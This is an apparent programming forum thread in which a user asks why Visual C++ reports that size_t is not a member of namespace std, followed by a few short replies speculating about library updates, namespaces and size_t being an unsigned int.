A Window's Instance
When you start an application such as Notepad, you are
said to have created an instance of the application. In the same way, when
you declare a variable of a class, an instance of the class is created and
made available to the project. The WinMain() function also allows you
to create an instance of an application, referred to as the hInstance
argument of the WinMain() function. The instance is created as an
HINSTANCE. The CWinApp class provides a corresponding instance
variable called m_hInstance. This variable can let you get a handle
to the instance of your application. Alternatively, to get a handle to the
instance of your application, you can call the AfxGetInstanceHandle()
global function. Its syntax is:
HINSTANCE AfxGetInstanceHandle();
Even more, to get a handle to your application, you can
call the Win32 API's GetWindowLong() function. Suppose you have
opened Notepad to view the source code of an HTML document. This is said
that you have an instance of Notepad. Imagine that you want to open a text
document using Notepad without closing the first instance of Notepad. To do
this, you must open another copy of Notepad. This second copy of Notepad is
another instance. In this case, the first instance is referred to as a
previous instance. For a Win32 application, the previous instance would be
the hPrevInstance argument of the WinMain() function. For a
Win32 application, the hPrevInstance argument always has the NULL
value. If you want to find out whether a previous instance of an application
already exists, you can call the CWnd::FindWindow() method. Its
syntax is:
static CWnd* PASCAL FindWindow(LPCTSTR lpszClassName, LPCTSTR lpszWindowName);
If you created the window or if it is a window you know
for sure, in which case it could be a WNDCLASS or WNDCLASSEX
object, specify it as the lpszClassName argument. If you do not know
its name with certainty, set this argument as NULL. The lpszWindowName
argument is the possible caption of the window you are looking for. Imagine
you position a button on a dialog box and you want the user to launch
Notepad with that button and imagine that, if Notepad is already opened,
there would be no reason to create another instance of it.
The CWinApp class provides all the
basic functionality that an application needs. It is equipped with a method
called InitInstance(). Its syntax is:
virtual BOOL InitInstance();
When creating an application, you must override this
method in your own class. This method is used to create an application. If
it succeeds, it returns TRUE or a non-zero value. If the application
could not be created, the method returns FALSE or 0. Here is an
example of implementing it:
class CSimpleApp : public CWinApp
{
BOOL InitInstance() { return TRUE; }
};
Based on your knowledge of C++, keep in mind that the
method could also have been implemented as:
struct CSimpleApp : public CWinApp
{
BOOL InitInstance()
{
return TRUE;
}
};
or:
struct CSimpleApp : public CWinApp
{
BOOL InitInstance();
};
BOOL CSimpleApp::InitInstance()
{
return TRUE;
}
Practical
Learning: Instantiating an Application
#include <afxwin.h>
class CExerciseApp : public CWinApp
{
BOOL InitInstance()
{
return TRUE;
}
};
CExerciseApp theApp;
The Command Line
To execute a program, you must communicate its path and
possibly some additional parameters to the compiler. This information is
called the command line information and it is supplied as a string. You need
to keep that in mind although all programs of our lessons will be compiled
inside of Visual C++. The command line information is supplied to the
compiler as the lpCmdLine argument of the WinMain() function.
Internally, Visual C++ creates the path and communicates it to the compiler
when you execute the program. If you want to find out what command line was
used to execute your program, you can call the Win32's GetCommandLine()
function. Its syntax is:
LPTSTR GetCommandLine(VOID);
This function takes no argument but returns the command
line of an application as a null-terminated string.
Introduction to Windows
Resources
Overview
In an MFC application, a resource is a text file that
allows the compiler to manage such objects as pictures, sounds, mouse
cursors, dialog boxes, etc. Microsoft Visual C++ makes creating a resource
file particularly easy by providing the necessary tools in the same
environment used to program. This means you usually do not have to use an
external application to create or configure a resource file (as done in
other programming environments).
Creating a Resource
Although an application can use various resources that
behave independently of each other, these resources are grouped into a text
file that has the .rc extension. You can create this file manually and fill
out all necessary parts but it is advantageous to let Microsoft Visual C++
create it for you. To start creating the resources:
Any of these actions would display the Add Resource
dialog box. From this dialog box, you would select the type of resource you
want and click New (or Import...). You will then be expected to design or
customize the resources. Throughout our lessons, we will see various
examples. After creating or designing a resource, you must save it. In most
cases, you can try closing the resource. In this case, Microsoft Visual C++
would prompt you to save the resource. If you agree to do this (which you
mostly should), Microsoft Visual Studio would create a new file with the
extension .rc.
To make your resource recognizable to the other files of
the program, you must also create a header file, usually called
resource.h. This header file must provide a constant integer that
identifies each resource and makes it available to any part that needs it.
This also means that most, if not all, of your resources will be represented
by an identifier.
Because resources are different entities, they are
created one at a time. They can also be imported from existing files.
The Add Resource dialog box provides an extensive list
of resources to accommodate almost any need. Still, if you do not see a
resource you need and know you can use it, you can add it manually to the
.rc file before executing the program.
Practical
Learning: Creating a Resource
Converting a Resource Identifier
An identifier is a constant integer whose name usually
starts with ID. Although in Win32 programming you usually can use the name
of a resource as a string, in MFC applications, resources are usually
referred to by their identifier. To make an identifier name (considered a
string) recognizable to an MFC (or Win32) function, you use a macro called
MAKEINTRESOURCE. Its syntax is:
LPTSTR MAKEINTRESOURCE(WORD IDentifier);
This macro takes the identifier of the resource and
returns a string that is given to the function that called it. In the strict
sense, after creating the resource file, it must be compiled to create a new
file that has the extension .res. Fortunately, Microsoft Visual C++
automatically compiles the file and links it to the application. | http://www.functionx.com/visualc/Lesson02.htm | CC-MAIN-2015-48 | refinedweb | 3,062 | 60.45 |
Here I will explain how to bind generic list to gridview and how to bind database values to generic list using asp.net.
Description:
In previous article I explained clearly about what is WCF and how we can use WCF in our applications. Now I will explain how to use Lists in our application to bind data to gridview and I will explain how to bind database values to generic list using asp.net.
First Create new website and Design your aspx page like this
After that add one class file to your website for that Right click on your website and select Add New Item à one window will open in that select Class file and give name as UserDetails.cs because here I am using this name in my sample if you want to give another name change UserDetails reference name in your sample.
Now open your Class file UserDetails.cs and write the following code
After that write the following code in code behind
After completion writing code in your class file open your Default.aspx.cs page add the following namespaces
After that write the following code in code behind
Demo
13 comments :
nice Article. Every one can understand easily
Does this example work with importing data from multiple tables and displaying in one grid?
I have use above example with multiple tables in select query but it's giving error.
A field or property with the name 'XX' was not found on the selected data source."
Ok all good it does work with multiple tables.. awesome example....
but this is useless ,can you tell me the live example where we need the genric,because this can we done by direct bindin colmn fiels to grid column
Now how to delete a item from generic list and again bind to grid
telugu valla satta chupistunnav..googlelo asp articles anni neeve chustunnaru...keep rocking suresh....all the good luck....
Sir Can You Please Help Me Out in Binding the Data from datatable in mysql to ListView in C# Windows Application...
Congratulations for your blog! It is really useful.
Can you explain how to fill only first column and first row with data from sql server?
Sorry for my english. Thank you!
how to store one by one row dinamically in two dimensional array and display them in asp.net using c#.............
Please Me............................
Hi
subject :
Bind grid when table record updated @ our side or any other user updating it
Read the senario carefully.
I have the grid and bind it using LINQ. Now when i update record in grid that time i rebind and get updated record. but problem in this case when any other user change the record and i no refresh the grid and try to update it that time i seen old record in grid. I want solution when table data is change either my side or any othe user side that time 1 trigger is fire and bind the grid automatic
Is it possible? I know the how to bind grid do not post such a solution.
HI,
Nice Post,Any doubt i m having any doubt in asp.net with c# ,means most of the time i referred your blogs only.its easy to understand..
Sir, This Abhinav Singh993 ; Please tell me is it possible to perform CRUD Operations using Generic List in asp.net using c# or it is only for the Displaying data, if possible please provide a tutorial over it. thank you.
how to insert value into the database using stored procedure and List<>........
Please help me.............. | http://www.aspdotnet-suresh.com/2011/07/how-to-bind-generic-list-to-gridview.html | CC-MAIN-2015-11 | refinedweb | 598 | 71.95 |
replica is tiny library to create copies of case classes with updated values using reflection.
The main use case for this library is a flat class hierachy of case classes extending an abstract base class that defines some common fields. Case class copy methods are generated by the compiler and cannot be accessed from the base class. Replica offers a simple way to update values defined in a base class without writing boilerplate code for each case class.
InstallationInstallation
replica is available from the Maven Central repository. The latest release is 0.0.2 and is built against Scala 2.11.7.
If you use SBT you can include replica in your project with
libraryDependencies += "com.mthaler" %% "replica" % "0.0.2"
UsageUsage
import com.mthaler.replica.Replicator abstract class HasName extends Product { def name: String } case class Person(name: String, age: Int) extends HasName case class Pet(name: String) extends HasName implicit class RichHasName[T <: HasName](value: T) { def withName(name: String) = Replicator.copy(value, Map("name" -> name)) } Person("Richard Feynman", 42).withName("Paul Dirac")
The result is
Person("Paul Dirac", 42).
##License replica is licensed under APL 2.0. | https://index.scala-lang.org/mthaler/replica/replica/0.0.5?target=_2.13 | CC-MAIN-2020-34 | refinedweb | 190 | 59.4 |
Combining parts of full file path in C# .NET
The Path class in the System.IO namespace provides a number of useful filepath-related methods. Say that you have the following ingredients of a full file path:
string drive = @"C:\"; string folders = @"logfiles\october\"; string fileName = "log.txt";
You can combine them into a full path using the Path.Combine method:
string fullPath = Path.Combine(drive, folders, fileName);
“fullPath” will be correctly set to C:\logfiles\october\log.txt. Path.Combine treats the individual parameters as path fragments and tries its best to concatenate them but it does more than just concatenating the strings.
Be careful when using drive names though. If you run the above example with
string drive = @"C:";
…i.e. miss the last slash then Path.Combine will not put it there automatically and “fullPath” will be C:logfiles\october\log.txt. If you miss the last slash from the folder name then Path.Combine will insert it for you.
Let’s see another example:
fullPath = Path.Combine(@"C:\logfiles", "october", "log.txt");
fullPath will be correctly set to C:\logfiles\october\log.txt.
View all various C# language feature related posts here.
Reblogged this on jogendra@.net. | https://dotnetcodr.com/2015/03/06/combining-parts-of-full-file-path-in-c-net/ | CC-MAIN-2021-21 | refinedweb | 201 | 62.24 |
A group blog from members of the VB team
It’s been a while since I wrote one of these XML cookbook entries. Here’s some info on a common problem: Really big XML files.
I’m going to show you two things in this recipe. The first is a tip on reading very large XML files while still being able to use XML Axis Properties. The second is how to do make it available to LINQ queries by exposing it as IEnumerable.
If you’re new to working with XML, there’s something important that you need to know. That is, when you load an XML file into an in-memory document, the entire file gets loaded into memory. When working with small XML files, which is often the case, this is no big deal. In fact, it’s rather convenient. However, if you are working with an extremely large XML file, this is a big problem. I recently wrote some code to read through a bunch of XML files, not realizing that one of them was over half a gigabyte! My code loaded the entire file into memory using the XDocument.Load() method—well, it tried to at least. Needless to say, when I hit the huge file, my app did not perform well.
How do you read an enormous XML file then? You use the XmlReader class, which has been around since the first release of the .NET Framework. It reads through an XML file, but simply places a pointer on the current XML element or attribute as you go through the file. As you read through the file with the XmlReader object, you can examine the current XML, decide if you are interested in it, process it, discard it, and move on to the next part of the file. The important thing is that you can minimize how much memory is utilized at any one time in your app.
Take heed: you still need to be aware of how you are reading through the file. If you open an XmlReader, read to the root element, then load that entire element into memory you haven’t solved anything.
Now you may be saying that if you use an XmlReader object, you don’t get all of the cool functionality of XML Axis Properties. That’s true, and that’s why there’s a ReadFrom method that reads the XML from your XmlReader into an XNode, which you can then cast as an XElement object and make use of all of the VB XML juicy goodness. Using an XmlReader and the ReadFrom method together ensures that you only use as much memory as the largest XML element that you load.
Let’s look at an example. The app that I was working on was reading through XML files that contained reflection information from .NET assemblies. For each member of a particular class, there was an <api> element. Within that <api> element there was a bunch of information about that member, and my app needed to grab some of the info for use in summary counts. Here’s an abbreviated XML sample of what the data looked like.
<reflection>
<apis>
<api id="M:Microsoft.VisualBasic.Strings.Mid(System.String,System.Int32)">
<apidata name="Mid" group="member" subgroup="method" />
<containers>
<namespace api="N:Microsoft.VisualBasic" />
<type api="T:Microsoft.VisualBasic.Strings" ref="true" />
</containers>
</api>
<api id="M:Microsoft.VisualBasic.Strings.Mid(System.String,System.Int32,System.Int32)">
<apidata name="Mid" group="member" subgroup="method" />
<namespace api="N:Microsoft.VisualBasic" />
<type api="T:Microsoft.VisualBasic.Strings" ref="true" />
</containers>
</api>
</apis>
</reflection>
Here’s some code to read through each <api> element, one at a time, with an XmlReader object. Once I have loaded the <api> element into an XElement object, I can use XML Axis properties to get values from the XML contained in the element. The most memory that I use is determined by the largest <api> element rather than the entire file.()
Now this code simply reads to the first <api> element and then reads all of its sibling <api> elements. If one of the <api> elements has a child <api> element, that child element gets loaded in the call to the ReadFrom method and the XmlReader object’s pointer moves past it. This works fine for my app because none of the <api> elements have child <api> elements. You may have different requirements and need to adjust your code.
I ran this code on a 5MB file with a little less than 30,000 <api> elements. Loading the entire file into memory consumed over 120MB. Using the XmlReader, the code consumed less than 1MB. I gathered memory stats using the GetTotalMemory method.
One last thing to note in this section is that you can also run into memory issues when writing to a file. If you create a large XDocument in memory, and then write it to a file, you end up consuming the memory required to create the document, which is likely unnecessary. You have a couple of choices to minimize your memory footprint while writing an XML file. Similar to using the XmlReader class and the ReadFrom method, you can use the XmlWriter class and the WriteTo method. As another option, you can use the XStreamingElement class to write a single element at a time from an enumerable source, such as a LINQ query.
In addition to having a small memory footprint, I also wanted to be able to use LINQ to query a large XML file. This can be achieved by creating a class that implements the IEnumerable interface. By fitting the code that I would have used to loop through the XML file into a class that implements IEnumerable(Of XElement), I can use an instance of that class as the source of any number of LINQ queries.
What I’ve created for this step is almost exactly the same as the class created by this walkthrough: Walkthrough: Implementing IEnumerable(Of T) in Visual Basic . The walkthrough shows you how to implement IEnumerable(Of String) to expose the contents of a text file one line at a time. We’ll do the same with an XML file.
When you implement IEnumerable, you actually need to implement both IEnumerable and IEnumerator. The bulk of your code goes into the IEnumerator implementation. You could create one class that implements both, but I like to split them into two classes.
I’ve called the class that implements IEnumerable(Of XElement) XmlReaderEnumerable. Following that naming convention I’ve called the class that implements IEnumerator(Of XElement) XmlReaderEnumerator. The behavior is the same as the earlier XmlReader example. The XmlReaderEnumerator class finds the first instance of a particular element, and then finds all of its sibling elements of the same name. As a result, I’ve added a constructor that takes both the path to the XML file, and the name of the XML element to search for. Note that the name is case sensitive as XML is case sensitive.
The XmlReaderEnumerable class doesn’t do much. All it does is return a reference to an instance of the XmlReaderEnumerator class. Here’s the code.
Public Class XmlReaderEnumerable
Implements IEnumerable(Of XElement)
Private _filePath As String
Private _elementName As String
Public Sub New(ByVal filePath As String, ByVal elementName As String)
_filePath = filePath
_elementName = elementName
End Sub
Public Function GetEnumerator() As IEnumerator(Of XElement) _
Implements IEnumerable(Of XElement).GetEnumerator
Return New XmlReaderEnumerator(_filePath, _elementName)
End Function
Private Function GetEnumerator1() As IEnumerator _
Implements IEnumerable.GetEnumerator
Return Me.GetEnumerator()
End Class
The XmlReaderEnumerator class is where the code resides to read through the XML file. In the constructor, it opens the file and moves to the start of the XML content. In the MoveNext method, it reads to the element of the supplied name (for example, “api”). In the Dispose method, it closes the reader. That’s it. It looks like a lot of code, but it really isn’t.
Public Class XmlReaderEnumerator
Implements IEnumerator(Of XElement)
Private _xmlReader As Xml.XmlReader
_xmlReader = Xml.XmlReader.Create(_filePath)
_xmlReader.MoveToContent()
Private _current As XElement
Public ReadOnly Property Current() As XElement _
Implements IEnumerator(Of XElement).Current
Get
If _xmlReader Is Nothing OrElse _current Is Nothing Then
Throw New InvalidOperationException()
End If
Return _current
End Get
End Property
Private ReadOnly Property Current1() As Object _
Implements IEnumerator.Current
Return Me.Current
Public Function MoveNext() As Boolean _
Implements System.Collections.IEnumerator.MoveNext
_current = If(_xmlReader.ReadToFollowing(_elementName),
TryCast(XElement.ReadFrom(_xmlReader), XElement),
Nothing)
Return If(_current IsNot Nothing, True, False)
Public Sub Reset() _
Implements System.Collections.IEnumerator.Reset
_xmlReader.Close()
_current = Nothing
Private disposedValue As Boolean = False
Protected Overridable Sub Dispose(ByVal disposing As Boolean)
If Not Me.disposedValue Then
If disposing Then
' Dispose of managed resources.
_current = Nothing
_xmlReader.Close()
End If
Me.disposedValue = True
Public Sub Dispose() Implements IDisposable.Dispose
Dispose(True)
GC.SuppressFinalize(Me)
Protected Overrides Sub Finalize()
Dispose(False)
Now you can read through a large XML file using LINQ queries like the following example.
Dim numAPIs = _
Aggregate api In New XmlReaderEnumerable(filePath, "api") Into Count()
Dim vbAPIs = From api In New XmlReaderEnumerable(filePath, "api") _
Where api.<containers>.<namespace>.@id = "N:Microsoft.VisualBasic"
i lyked dis thx xxxxxx meet hot singles in ur area, just follow ta link xxxx | http://blogs.msdn.com/b/vbteam/archive/2010/06/07/vb-xml-cookbook-recipe-7-enumerating-large-xml-files-doug-rothaus.aspx?Redirected=true | CC-MAIN-2015-14 | refinedweb | 1,557 | 55.95 |
I have just returned from Santa Cruz where we held the semiannual Standards meeting on C++. I spent most of my time in the Library Working Group discussing new features for the next Library Extensions Technical Report. I have reported on some of the main topics below.
Move semantics
Move semantics promises to significantly increase run-time efficiency of many library elements — in some cases by a factor of 10+. The proposal has generated a lot of discussion for years and is finally bearing fruit. It originates in the Core Working Group but mainly affects the Library. Changes are 100% compatible with existing code, while introducing a fundamental new concept into C++.
This proposal augments copy semantics. A user might define a class as copyable and movable, either plain old data structures (PODs), move and copy are identical operations (right down to the machine instruction level).
This paper proposes the introduction of a new type of reference that will bind to an rvalue:
struct A {/*...*/}; void foo(A&& i); // new syntax
The
&& is the token which identifies the reference as an “rvalue reference” (bindable to an rvalue) and thus distinguishes it from our current reference syntax (using a single
&).
The rvalue reference is a new type, distinct from the current (lvalue) reference. Functions can be overloaded on
A& and
A&&, requiring such functions each to have distinct signatures.
The most common overload set anticipated is:
void foo(const A& t); // #1 void foo(A&& t); // #2
The rules for overload resolution are (in addition to the current rules):
- rvalues prefer rvalue references.
- lvalues.
Tuples
Tuples are fixed-size heterogeneous containers containing any number of elements. They are a generalized form of
std::pair. The proposal originates in the Core Working Group from a Boost Library [1] implementation, but it will mainly affect in the Library.
The proposed tuple types:
Support a wider range of element types (e.g. reference types).
Support input from and output to streams, customizable with specific manipulators.
Provide a mechanism for ‘unpacking’ tuple elements into separate variables. The tuple template can be instantiated with any number of arguments from 0 to some predefined upper limit. In the Boost Tuple library, this limit is 10. The argument types can be any valid C++ types. For example:
typedef tuple< A, const B, volatile C, const volatile D > t1;
An n-element tuple has a default constructor, a constructor with n parameters, a copy constructor and a converting copy constructor. By converting copy constructor we refer to a constructor that can construct a tuple from another tuple, as long as the type of each element of the source tuple is convertible to the type of the corresponding element of the target tuple. The types of the elements restrict which constructors can be used:
If an n-element tuple is constructed with a constructor taking 0 elements, all elements must be default constructible.
For example:
class no_default_ctor {no_default_ctor();}; tuple<no_default_ctor, float> b; // error - need default ctor tuple<int&> c; // err no ref default ctor tuple<int, float> a; // ok
If an n-element tuple is constructed with a constructor taking n elements, all elements must be copy constructible and convertible (default initializable) from the corresponding argument. For example:
tuple<int, const int, std::string>(1, 'a', "Hi") // ok tuple<int, std::string>(1, 2); // error
If an n-element tuple is constructed with the converting copy constructor, each element type of the constructed tuple type must be convertible from the corresponding element type of the argument.
tuple<char, int, const char(&)[3]> t1('a', 1, "Hi"); tuple<int,float,std::string> t2 = t1; // ok
The argument to this constructor does not actually have to be of the standard tuple type, but can be any tuple-like type that acts like the standard tuple type, in the sense of providing the same element access interface. For example,
std::pair is such a tuple-like type. For example:
tuple<int,int> t3 = make_pair('a',1); // ok
The proposal includes tuple constructors, utility functions, and ways of testing for tuples. The I/O streams library will be updated to support input and output of tuples. For example,
cout << make_tuple(1,"C++");
outputs
(1 C++)
Hash Tables
Hash tables almost made it into the first issue of the Standard, but our deadline precluded doing due diligence on the proposal at the time.
The current proposal is what you would expect and is compatible with the three main library implementations for hash tables: SGI/STLport, Dinkumware, and Metrowerks. What is new is that things like
max_factor,
load_factor, and other constants are now treated as hints. Each implementation is free to deal with them as it sees fit. Also, most double values and parameters are going to be
float. It was felt that only one or two significant digits were meaningful, so the extra space needed by
double was wasted.
There was one major outstanding issue. Since there are already widespread hash library implementations in use, how do we avoid breaking existing code. Proposals included making the new hash library names slightly different, or placing them in different namespaces, or usurping the current names because only the committee has the authority to place things in namespace
std (any private implementation that placed their hash library into
std was, by definition, in error.)
Polymorphic Function Object Wrapper
This proposal is based on the Boost Function Template Library [1]. It was accepted in Santa Cruz for inclusion in the next TR of the standard. It introduces a class template that generalizes the notion of a function pointer to subsume function pointers, member function pointers, and arbitrary function objects while maintaining similar syntax and semantics to function pointers.. For; // outputs 5 f = minus<int>(); cout << f(2, 3) << endl; // outputs -1
The proposed function object wrapper supports only a subset of the operations supported by function pointers with slightly different syntax and semantics. The major differences are detailed below, but can be summarized as follows:
Relaxation of target requirements to allow conversions in arguments and result type.
Lack of comparison operators. However, checking
if (f)and
if (!f)is allowed.
Lack of extraneous null-checking syntax. The function class template is always a function object.
Conclusions
This short report did not touch on other exciting new features that will likely appear in the language, including the Regular Expression proposal, the use of static assertions to allow more extensive compile-time checking based on type information, and the auto expressions proposal to simplify template function definitions.
As you can see from the wide range of topics we discussed in Santa Cruz, C++ is still an exciting language that is continuing to adapt to users needs.
Reg Charney
References
[1] The Boost Library:
This article was originally published on the ACCU USA website in November 2002 at
Thanks to Reg for allowing us to reprint it. | https://accu.org/index.php/journals/2013 | CC-MAIN-2018-13 | refinedweb | 1,145 | 50.36 |
======
Project references break on XAML save. Potentially Intellisense bug?
Related to Desk case 241961
Steps to Reproduce
============
Make a change to XAML file and save.
See screencast:
Actual Results
=========
Introduces 200+ errors:
> The type or namespace name 'Tether' does not exist in namespace 'INRIX' (are you missing an assembly reference?)
Expected Results
===========
Project should build with no further errors.
Other information
===========
Version info:
Microsoft Visual Studio Enterprise 2015
Version 14.0.24720.00 Update 1
Microsoft .NET Framework
Version 4.6.01038
Installed Version: Enterprise
Architecture and Modeling Tools 00322-80000-00000-AA869
Microsoft Architecture and Modeling Tools
UML® and Unified Modeling Language™ are trademarks or registered trademarks of the Object Management Group, Inc. in the United States and other countries.
Visual Basic 2015 00322-80000-00000-AA869
Microsoft Visual Basic 2015
Visual C# 2015 00322-80000-00000-AA869
Microsoft Visual C# 2015
Visual C++ 2015 00322-80000-00000-AA869
Microsoft Visual C++ 2015
Application Insights Tools for Visual Studio Package 1.0
Application Insights Tools for Visual Studio
ASP.NET and Web Tools 2015.1 (Beta8) 14.1.11106.0
ASP.NET and Web Tools 2015.1 (Beta8)
ASP.NET Web Frameworks and Tools 2012.2 4.1.41102.0
For additional information, visit
ASP.NET Web Frameworks and Tools 2013 5.2.30624.0
For additional information, visit
Xamarin 4.0.0.1717 (1390b70) 6.0.0.35 (d300845)
Visual Studio plugin to enable development for Xamarin.Android.
Xamarin.iOS 9.3.99.33 (ea30b32)
Visual Studio extension to enable development for Xamarin.iOS.
XamlStylerVSPackage 1.0
Xaml Styler.
I suspect this is a duplicate of Bug 32988.
One way to check if this is indeed a duplicate of Bug 32988 would be to downgrade the customer's example project temporarily to Xamarin.Forms 1.4.3 and see if the problem stops. If the problem does stop, this can be marked as a duplicate of Bug 32988.
I will mark the bug as "need info" pending that test.
(Side note: the links attached to this bug privately so far are just version information. No sample project is attached yet.)
Ah ha. I found the link for the full test case in the original email support case. The problem does indeed stop if I downgrade the project to Xamarin.Forms 1.4.3.6376 and start again if I upgrade to Xamarin.Forms 1.4, so the behavior matches Bug 32988 (and the closely related Bug 33181).
I will accordingly mark this bug as a duplicate.
*** This bug has been marked as a duplicate of bug 32988 *** | https://bugzilla.xamarin.com/show_bug.cgi?id=37413 | CC-MAIN-2019-09 | refinedweb | 429 | 61.22 |
ExceptionCode.
INDEX_SIZE_ERR: If index or size is negative, or greater than the allowed value.
DOMSTRING_SIZE_ERR: If the specified range of text does not fit into a DOMString.
HIERARCHY_REQUEST_ERR: If any node is inserted somewhere it doesn't belong.
WRONG_DOCUMENT_ERR: If a node is used in a different document than the one that created it (that doesn't support it).
INVALID_CHARACTER_ERR: If an invalid or illegal character is specified, such as in a name. See production 2 in the XML specification for the definition of a legal character, and production 5 for the definition of a legal name character.
NO_DATA_ALLOWED_ERR: If data is specified for a node which does not support data.
NO_MODIFICATION_ALLOWED_ERR: If an attempt is made to modify an object where modifications are not allowed.
NOT_FOUND_ERR: If an attempt is made to reference a node in a context where it does not exist.
NOT_SUPPORTED_ERR: If the implementation does not support the requested type of object or operation.
INUSE_ATTRIBUTE_ERR: If an attempt is made to add an attribute that is already in use elsewhere.
The above are since DOM Level 1
INVALID_STATE_ERR: If an attempt is made to use an object that is not, or is no longer, usable.
SYNTAX_ERR: If an invalid or illegal string is specified.
INVALID_MODIFICATION_ERR: If an attempt is made to modify the type of the underlying object.
NAMESPACE_ERR: If an attempt is made to create or change an object in a way which is incorrect with regard to namespaces.
INVALID_ACCESS_ERR: If a parameter or an operation is not supported by the underlying object.
The above are since DOM Level 2
VALIDATION_ERR: If a call to a method such as
insertBefore or
removeChild would make the
Node invalid with respect to "partial validity", this exception would be raised and the operation would not be done.
TYPE_MISMATCH_ERR: If the type of an object is incompatible with the expected type of the parameter associated to the object, this exception would be raised.
The above is since DOM Level 3
Default constructor for DOMException.
Constructor which takes an error code and an optional message code.
Copy constructor.
Destructor for DOMEx.
Referenced by getMessage(). | http://xerces.apache.org/xerces-c/apiDocs-3/classDOMException.html | CC-MAIN-2021-49 | refinedweb | 354 | 55.24 |
Getting Groovy
Doug Sabers, Object Partners
Scott Vlaminck, SmartThings
What is Groovy
- lightweight
- dynamic
- optionally typed
- object-oriented
- runs on the JVM
- compiles to Java bytecode
- runs on Java 1.5 and newer
- open source
- inspired by languages like Python, Ruby and Smalltalk
Think of Groovy as an extension of the JDK
Plays nice with Java
Groovy provides seamless integration with the the Java Runtime Environment.
Groovy is only a new way of creating ordinary Java classes -- from a runtime perspective
You can call Java classes from your Groovy code and vice versa
Get Groovy
Almost all Java code is valid Groovy code
Let's convert this Java code to Groovy
public class Hello {
public static void main(String[] args) {
for (int i = 0; i < 3; i++) {
System.out.print("hello ");
}
System.out.println("Code People");
}
}
Groovy magic
Groovy allows to write less code by providing some defualts.
The following packages are imported by default in Groovy
-
- java.io.*
- java.lang.*
- java.math.BigDecimal
- java.math.BigInteger
- java.net.*
- java.util.*
- groovy.lang.*
- groovy.util.*
So we can write code like this without an import statement:
def now = new Date()
def file = new File("/Users/Doug/test.txt")
def url = new URL('")
def list = new ArrayList()
Using Def
def is a keyword to replace a type name when declaring a variable. Basically it means we don't want to define the type ourselves. This is called "duck typing". The type of the variable is determined at runtime.
Code Examples
Groovy Strings
- Known as GStrings
- Surrounded by double quotes
- regular strings are surrounded by single quotes
- can contain Groovy expressions inside ${ }
def fname = "Doug"
def lname = "Sabers"
println "Hello, my name is ${fname} ${lname}"
Groovy List and Maps
def myList = [2014, 1, 2, -9, 0, 8987987987]
println myList[0]
println myList.size()
def myMap = ["name": "Doug", "age": 37, "favNumber": 87.13 ]
println myMap.name
println myMap["age"]
Groovy Truth
def a = true
def b = true
def c = false
assert a
assert a && b
assert a || c
assert !c
code examples
closures
You can create chunks of code that can be passed around
def square = {it * it }
square(8)
Reading a file
def file = new File("/Users/Doug/Desktop/dougfile.txt")
file.each {
println it
}
Regular expressions
I had a problem that could only be solved by regex, now I have 2 problems...
import java.util.regex.Pattern
Pattern myPattern = ~/\p{Digit}{1,3}-\p{Digit}{1,2}-\p{Digit}{1,4}/
def var = "1-2-2"
var.matches(myPattern)
Testing your java code with Spock
- Already using Java JUnit? converting to Spock is easy and fun
- Detailed information using Groovy's power asserts
- Makes tests readable
- Compatible with JUnit - uses JUnits reporting capabilities
- Better Mocking
-
- Spock Web Console for playing -
Groovy is everywhere
Groovy -
Grails - full stack web application framework
GPars for concurrency -
Gradle for build automation -
Geb - groovy wrapper around WebDriver -
RatPack - toolkit for building high performance web apps -
Gaelyk - Deploy apps on Google App Engine
GroovyFX - Groovy binding for JavaFX
Griffon - Groovy desktop applications
GVM - tool for managing parallel Versions of multiple SDKs on most Unix based systems
Want to learn more?
Groovy User Group of MN -
Questions?
Getting Groovy
By Doug Sabers
Getting Groovy | http://slides.com/sabersd/getting-groovy | CC-MAIN-2017-39 | refinedweb | 536 | 56.69 |
I was just compiling a program using visual studio C++ and it gave me an errror saying that size_t was not part of the standard library. Explaining a little bit more in the C standard library there is a standard type size_t which can only be assigned a positive int number.
I have a line of code saying
typedef std::size_t size_type;
which defined the size type as size_t, It didnt give me any errors while running on linux however in visual studio I get an error saying
error C2039: 'size_t' : is not a member of 'std'
Does this mean that maybe my standard libraries in visual studio need an update or is there any other reason why it is giving me this error
Thanx in advance byeeee
I Speak in frequencies even dogs have trouble hearing
That is all I got on this.
THANX for the post but Im still confused jeje Ill try to update my libraries and see what happens
size_t is part of the ANSI C Standard Library, and is of type unsigned int. Check with Microsoft if there are any updates to your libraries and headers that corrects this deviation from ANSI C.
Get OpenSolaris
youve assigned size_t tp the namespace std. *nix might have just ignnored the namespace and just used the size_t while the windows compiler is a little more stringent.
all size_t is is an usigned ing why dont you just use
typedef unsigned int size_type
*ing should have been int
That which does not kill me makes me stronger -- Friedrich Nietzche
Forum Rules | http://www.antionline.com/showthread.php?247737-standard-library-error | CC-MAIN-2016-44 | refinedweb | 262 | 63.77 |
OData enablement is a subject of significance, especially, considering pressing needs of requirement by frameworks that facilitate state-of-the-art user interfaces. It also becomes important by another high-demand requirement that is multichannel access to services and solutions.
It is evident that OData is endorsed in SAP world. In fact, the ABAP stack has a pretty mature Out-Of-the-Box availability of OData enablement.
The blog – What’s new in Process Orchestration 7.31 SP09/7.4 SP04 , provides introduction of BPM OData services. It’s not only pleasing to realize the availability of OData service for BPM, but reflects importance of ‘OData exposure for technologies’.
In the light of realization of the significance of OData enablement, there are a few use cases which still stand devoid of OData enablement – a situation that we recently came across in our team. They were :
Need for exposure of not only BPM but CAF (Composite Application Framework) services as well in form of OData services.
- Existing CAF based solutions with WebDynpro and VC as front end might want to move to UI5 based state-of-the-art solutions, to be also able to have multiple device access enablement. The wish here would be that this should be possible with minimal effort. We should be able to draw advantage of the layered architecture. Thus utilizing most of the existing solution.
Exposure of BPM for PO versions before 7.31 SP 09, with minimal effort for achieving OData enablement.
Ahead, in the article I will present the approach used to enable OData enablement from point of view of components involved (and step-wise description, perhaps later, if needed).
The OData enablement is done for two scenarios :
Exposing CAF service as an OData Endpoint. (CAF services then, may or may not, initiate a BPM process)
Exposing BPM as an OData endpoint
Prerequisite:
- We used odata4j library as dependency for OData capabilities. The odata4j library download information may be accessed at this link.
- For creation of OData request we used :
So, here is a synopsis of the steps we followed :
Exposing CAF service as OData Endpoint
- Create and fire an OData request, from OData consumer (may or may not be a web module for composing the OData request to act as an OData consumer)
- Façade DC invokes CAF Service – Query parameters are extracted from OData request and used to invoke CAF services through JNDI invocation.
Few points about this Façade Development Component :
- Request is received at one of the exposed end-points ( from within a web module, separately deployable as an enterprise DC).
- This web module performs an ejb invocation to CAF operation (which can then invoke BPM service).
- The web module has dependencies on a DC created as type of ‘External Library’ which consists of jar files from odata4j library. Also, the web module has created namespace for OData request and registered resource, as well.
- Query parameters are extracted from the request payload.
